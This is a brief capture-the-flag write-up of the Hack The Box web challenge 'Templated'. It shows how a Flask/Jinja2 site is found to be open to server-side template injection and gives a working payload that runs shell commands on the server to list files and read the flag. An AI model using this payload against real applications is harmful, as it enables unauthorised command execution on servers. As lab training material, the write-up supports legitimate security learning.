Simple Web Challenge on HTB | Templated

--

Hey folks, here is a simple web challenge for you…

The name of the challenge is Templated.

Web Challenge Templated

Let’s start by opening the web interface.

Flask/Jinja2

We can see that the site uses python, let’s look bit more…

Werkzeug/1.0.1 Python/3.9.0

The web uses Werkzeug/1.0.1 Python/3.9.0.

Vulnerable to SSTI

While doing basic tests we got that the site is vulnerable to SSTI!! 😋

SSTI = Server-Side Template Injection

I quickly searched Google and came across Gus Ralph’s write-up on Server Side Template Injection with Jinja2.

Let’s Exploit!!

Exploitation part is very basic.

Payload = {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

id command gets executed

Let’s try listing files.

Listing files

We found the flag.txt!! Read the file to get the flag.

Got the flag!

Yeahhyy!!💥We got the flag!!!

That way a simple SSTI challange!! Try it yourself ❤

--

--